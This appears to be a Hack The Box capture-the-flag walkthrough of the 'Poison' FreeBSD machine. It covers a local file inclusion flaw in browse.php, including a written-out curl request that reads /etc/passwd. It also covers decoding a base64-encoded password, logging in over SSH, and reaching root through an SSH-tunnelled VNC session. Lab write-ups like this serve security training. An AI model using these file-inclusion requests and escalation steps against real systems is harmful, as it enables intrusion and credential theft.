Hack The Box

HackTheBox “Poison” Walkthrough

Poison, a medium-level FreeBSD OS machine on HackTheBox, features a vulnerable web service that is susceptible to a local file inclusion vulnerability. By exploiting this vulnerability, an obfuscated password…

HackTheBox “Poison” Walkthrough, figure 1

Poison, a medium-level FreeBSD OS machine on HackTheBox, features a vulnerable web service that is susceptible to a local file inclusion vulnerability. By exploiting this vulnerability, an obfuscated password belonging to a user is retrieved, enabling access to an SSH shell. The process of privilege escalation involves exploiting a root-level VNC process.

Let’s get started! 🚀

Recon & Enumeration

Let’s use nmap to scan for open ports and services:

HackTheBox “Poison” Walkthrough, figure 2

Visit the target on port 80.

HackTheBox “Poison” Walkthrough, figure 3

From the PHP scripts mentioned, we will submit the “listfiles.php” script in the Scriptname field.

HackTheBox “Poison” Walkthrough, figure 4

It shows us numerous files, including a file named pwdbackup.txt.

To access the file pwdbackup.txt, we will modify the URL to http://10.10.10.84/browse.php?file=pwdbackup.txt.

HackTheBox “Poison” Walkthrough, figure 5
This password is secure, it's encoded atleast 13 times.. what could go wrong really.. Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO Ukd4RVdub3dPVU5uUFQwSwo=

The file contains of base64 encoded characters, with a minimum of 13 encoding iterations as mentioned by the header of the file.

I will utilize an automated tool available here to decode base64 strings until they can no longer be decoded.

HackTheBox “Poison” Walkthrough, figure 6

Paste in the encoded characters.

HackTheBox “Poison” Walkthrough, figure 7

Upon decoding, the password obtained is “Charix!2#4%6&8(0”.

Upon placing the file “pwdbackup.txt” in the URL, we suspected the presence of local file inclusion (LFI) vulnerabilities. Further enumeration led to the discovery of an LFI vulnerability at the URL http://10.10.10.84/browse.php?file=/etc/passwd.

HackTheBox “Poison” Walkthrough, figure 8
└─$ curl http://10.10.10.84/browse.php?file=/etc/passwd# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $#root:*:0:0:Charlie &:/root:/bin/cshtoor:*:0:0:Bourne-again Superuser:/root:daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologinoperator:*:2:5:System &:/:/usr/sbin/nologinbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologintty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologinkmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologingames:*:7:13:Games pseudo-user:/:/usr/sbin/nologinnews:*:8:8:News Subsystem:/:/usr/sbin/nologinman:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologinsshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologinsmmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologinmailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologinbind:*:53:53:Bind Sandbox:/:/usr/sbin/nologinunbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologinproxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologinuucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucicopop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologinauditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologinwww:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologinhast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologinnobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologinmessagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologinavahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologincups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologincharix:*:1001:1001:charix:/home/charix:/bin/csh

Using the username “charix” found in the file “/etc/passwd” and the password “Charix!2#4%6&8(0” we got recently, we can now proceed to SSH into the target.

HackTheBox “Poison” Walkthrough, figure 9

We successfully logged in and discovered a file named secret.zip.

HackTheBox “Poison” Walkthrough, figure 10

Transfer the archive file into the attack box as we failed to unzip it.

HackTheBox “Poison” Walkthrough, figure 11

We encountered a password prompt while attempting to unzip the file on our system. To proceed, we can utilize the password “Charix!2#4%6&8(0”.

HackTheBox “Poison” Walkthrough, figure 12

We got a file “secret” which could be a password of a service, let’s check the running processes.

HackTheBox “Poison” Walkthrough, figure 13

The open ports 5901 and 5908 correspond to VNC, potentially providing a root-level entry point.

The VNC ports only listening on localhost, direct access from our attack box is not possible. Instead, we will utilize SSH tunneling and proxychains to establish a connection with the local listener “VNC.”

Enable proxychains.

HackTheBox “Poison” Walkthrough, figure 14

Bind SSH with proxychains port.

HackTheBox “Poison” Walkthrough, figure 15

Using proxychains, we VNC connect to the target’s VNC listening port using the password file we got “secret”.

HackTheBox “Poison” Walkthrough, figure 16

Another window pops up for VNC viewer.

HackTheBox “Poison” Walkthrough, figure 17

And we get a root shell.

Cheers.